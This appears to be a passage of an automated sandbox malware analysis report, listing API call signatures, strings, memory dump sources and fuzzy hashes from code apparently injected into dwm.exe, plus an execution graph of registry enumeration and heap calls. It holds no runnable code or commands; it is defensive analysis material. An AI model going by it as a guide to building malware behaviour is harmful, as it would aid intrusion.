                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: f6c8686a963b06d401097b7cd63309989d8e7c6680c96792ee70745997e45fcf
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: C4415B33614B809BE7608F62E44879AB7B1F389B84F108129DBCD07A98EF38D565CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996207856.000002BAAED80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaed80000_dwm.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: afa602538d2797bded4b6c7ea06a470d0bb9dafd4f93a30f4a6eaa79a6e8d66a
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 4081F7317002C186FA50AB65984D37977F0E7457A0F744025AAED87B96EB7ACC46C333
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 637ba7a130481ab4aa70c731ea2e48fbfcaae0396f108508a8e9abee0c3e8b45
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: A781B221B0434187FB55AB7A984D39973B0AB85B80F744655AACD8B796FB38C842C733
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: 46fedad571d6e0e71bf392c82b2639354194fb128bedf8d1f59ed41f6ed11f77
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: FA31B236312B9091FE56DB12A81879973B4BB48BA0F794529EDAD4B380FF38C445C322
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 7098e56acce4b39502feb592609ec6dd6905e35d3a31d2c5f3171e59dccca79d
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 5C118F22314B5086E7528F66E84831AB3B0F7C8FE8F244224EA9D87794DF78C914C756
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 3a24ce44e79b6b776c15c23bf2c7989751fbfc41cf4a95416b0ee1e99915caa9
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 7C319E22701B51D6FB15DF66A94866AB3B4FB44BC4F1881249ECC07B94FF78C4A5C721
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 506f6658548811763228039e07b5795d7bf15ad9a0ccc51ea1d91a5c914d76a6
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 0F011721300A4196EA14DB22A85875A73A1F788FC0F688475DE8D43794DF38C98AC761
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 67999034e11645333b8a6c53b2e4db2230f9a4ec6a75d40c35783385d88edd94
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 1E111775611B4086FB269B21E80D76A77B0FB88B81F240429DE8D077A4EF3DC408C722
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: 003a4c172d3d42e66d507e8ae2bd037edcb503f154cd4c8e19880211964d336f
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: 9851AE32A116809AFB18DF25E54CB5937B5F385BC8FB08124EE9E47788EB35D841C722
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 8771b474f7b581c9b150134b4bbfc6d3e1b9b378b40739f106a50c69a1b33895
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: C6F04F62304641D2FB608B61F59939A7770F784BC8F948064DACD4B954EF2CC689CB15
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: aead92bbb4e78c7c91f7c7d09d0a1c10e5faa71f78d2c7a386896b4190cc0542
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: F1F08C20304B8092FA008B23BA4911AB330EB88FD0F289171EEDE47B28DF2CC482C311
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 7903009311fbbe882884880aa8473a12e871a9b0ebd468cee4f291d41f21e0e0
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 3AF0126132174491FF954F70E88C3693770EBD8BD0F642419958F495A4DF38C489C722
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: 35f79d32ad40f95a694ab73e9ae1ae3023161f3afe97160518e03bc0ad132198
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: EC81BF2261061089FB52AF7598683AD77B1F7C4BC8F645216DE8E977D2DB34C442C732
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
                                                • Instruction ID: ee48daa08d62aae587466935353a2672d63264273ec1ae417d64d6eeb2c7b418
                                                • Opcode Fuzzy Hash: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
                                                • Instruction Fuzzy Hash: FA61C836519B40C6FB609B15E49871AB7B1F3C8B84F201615EACE87BA8EB7CC450CF51
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996207856.000002BAAED80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaed80000_dwm.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 46f915988d1421102dcdc82b7975ccb72b32a6b5722b91e8b7d4d7e4d90cae6a
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 2A117322A54A1101FA641175ED5E36933716B54374F7B462CAAFF0AFE6AB2A8C43C122
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: ec6c5d9e337470a63c90dc94213730dc61b9379da416219e9f279c20de9c9e43
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 79117323A58A3141F69B1178E45E36933717BEA3F4F74462CAAFE063D68B548D41D132
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996207856.000002BAAED80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaed80000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: dd434be0664191bedbfb9aec411bcd668004c6ad845439f1ee4a200c2d89c5f7
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 2151B23A7126808BDB14DF15F848B2933B5F340B98FB18125DA8E67788EB35CD41C726
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996207856.000002BAAED80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaed80000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: c48fda967e298243dbab0d24029148cb6e945a7cf09b7d01290e854a90eb0d3a
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 0E31BC7A21168096E714DF15EC48B2937B4F740B88FA58015AE8E27B84DB39C941C72A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: 1bed4f72e0546fda5ce63700dae4d6bf2b4f7479e33116dad73f111ba9ff2ee0
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: 57118832514B88DAE752CFA6A80821A73B0F789BC0F244169EBCE03794DF38C011C712
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 9d6b5349f1b79481180b62943ed2eb4ae12f6ce4e38b49187bd1f49078394ae9
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 7871C03721078186FB289F6A99583AAB7B0F784BC4F640416DECD4BB88EF35C604C752
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: d35c572646b628525abb7c1ddf26b5ce444fe5a68a734bab67609ae404b7482b
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 3D51D53320878182F634AE2DA55C3AA77B5F385780F600025CDCE43B99EF39C401CB62
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 3a8e2a19e2305fa9e7e55a122835e83f94b4ed9a778bf159358e5e7576f9c86f
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 5041B372314A8082EB219F25E4583AAB7B0F7C87C4F604125EE8D87798EB3CC541CB51
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 61748a736af2ce7bde860560ce7a463ff8d16192f94909f223a408e2ea4514a5
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: C3110636608B8086DB60CB16B48429AB7B4F7C9BD4F644126EECE87B59DF38C450CB10
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: af454ba07860bef1790b1e5b042bc5a33c8b92364bd8c09e3fa77ad3bf8e99c6
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 07111C32218B8482EB658F25E54425AB7F5F788B98F684225DFCD0BB68EF38C555CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 6ad062c0180f7864ff70bb7064ab8f3a4ba0033f7727923c5617e2fba21a8cbe
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: AEF0EC21310B8082FB06AB61F4082997731EBC8BC8F685021AACD07B14CF38C895C722
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996207856.000002BAAED80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaed80000_dwm.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: c3d8921cda906c5774e95c25f1aac2569b143f39ba3aa41cc85fa96dd22f5b4c
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: ACE09222300981D2EA059B55F8892F83331EB84744F795022999D06AA2EF38CC86C3A3
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 7175b32d844fbc15a9c60f16fb79484b7ca4416aee09d4379b99d7a929790b2c
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: A2E0926120064091FF0A5B70F90C7957332BBC8BC8F785122D98D0A355DF38C895CB32
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 5cc7abca7694cab9112d3cf3a1a3df09c09231f77e8e13057b94709d3ba09284
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 1E215122605B9086EB128F6AA40829AB3B0FBC8B94F254115DECD87B64FF78C556C711
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 4b139374240ba397b5748053f9e08d1b555f4558e1e32fd13367c7b192aa7479
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: D0E03971611600CAE7058BB2D80834A37F1EB89B81F588024C98D07390DF7D8499CB61

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:68
                                                Total number of Limit Nodes:2
                                                execution_graph 13990 26a879c1c28 13995 26a879c1650 GetProcessHeap HeapAlloc 13990->13995 13992 26a879c1c3e Sleep SleepEx 13993 26a879c1c37 13992->13993 13993->13992 13994 26a879c15c0 StrCmpIW StrCmpW 13993->13994 13994->13993 14039 26a879c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13995->14039 13997 26a879c1678 14040 26a879c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13997->14040 13999 26a879c1689 14041 26a879c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13999->14041 14001 26a879c1692 14042 26a879c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14001->14042 14003 26a879c169b 14004 26a879c16b6 RegOpenKeyExW 14003->14004 14005 26a879c16e8 RegOpenKeyExW 14004->14005 14006 26a879c18ce 14004->14006 14007 26a879c1727 RegOpenKeyExW 14005->14007 14008 26a879c1711 14005->14008 14006->13993 14009 26a879c1762 RegOpenKeyExW 14007->14009 14010 26a879c174b 14007->14010 14043 26a879c12c8 RegQueryInfoKeyW 14008->14043 14013 26a879c1786 14009->14013 14014 26a879c179d RegOpenKeyExW 14009->14014 14053 26a879c104c RegQueryInfoKeyW 14010->14053 14017 26a879c12c8 16 API calls 14013->14017 14018 26a879c17d8 RegOpenKeyExW 14014->14018 14019 26a879c17c1 14014->14019 14020 26a879c1793 RegCloseKey 14017->14020 14022 26a879c1813 RegOpenKeyExW 14018->14022 14023 26a879c17fc 14018->14023 14021 26a879c12c8 16 API calls 14019->14021 14020->14014 14026 26a879c17ce RegCloseKey 14021->14026 14024 26a879c1837 14022->14024 14025 26a879c184e RegOpenKeyExW 14022->14025 14027 26a879c12c8 16 API calls 14023->14027 14028 26a879c104c 6 API calls 14024->14028 14029 26a879c1889 RegOpenKeyExW 14025->14029 14030 26a879c1872 14025->14030 14026->14018 14031 26a879c1809 RegCloseKey 14027->14031 14032 26a879c1844 RegCloseKey 14028->14032 14034 26a879c18c4 RegCloseKey 14029->14034 14035 26a879c18ad 14029->14035 14033 26a879c104c 6 API calls 14030->14033 14031->14022 14032->14025 14036 26a879c187f RegCloseKey 14033->14036 14034->14006 14037 26a879c104c 6 API calls 14035->14037 14036->14029 14038 26a879c18ba RegCloseKey 14037->14038 14038->14034 14039->13997 14040->13999 14041->14001 14042->14003 14044 26a879c1499 RegCloseKey 14043->14044 14045 26a879c1334 GetProcessHeap HeapAlloc 14043->14045 14044->14007 14046 26a879c1485 GetProcessHeap HeapFree 14045->14046 14047 26a879c135d RegEnumValueW 14045->14047 14046->14044 14051 26a879c13af 14047->14051 14049 26a879c142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14049->14051 14050 26a879c13dd GetProcessHeap HeapAlloc 14050->14051 14051->14046 14051->14047 14051->14049 14051->14050 14052 26a879c1413 GetProcessHeap HeapFree 14051->14052 14059 26a879c1554 14051->14059 14052->14049 14054 26a879c11b5 RegCloseKey 14053->14054 14057 26a879c10b9 14053->14057 14054->14009 14055 26a879c10c7 RegEnumValueW 14055->14057 14056 26a879c1149 GetProcessHeap HeapAlloc 14056->14057 14057->14054 14057->14055 14057->14056 14058 26a879c117f GetProcessHeap HeapFree 14057->14058 14058->14057 14060 26a879c156e 14059->14060 14063 26a879c15a4 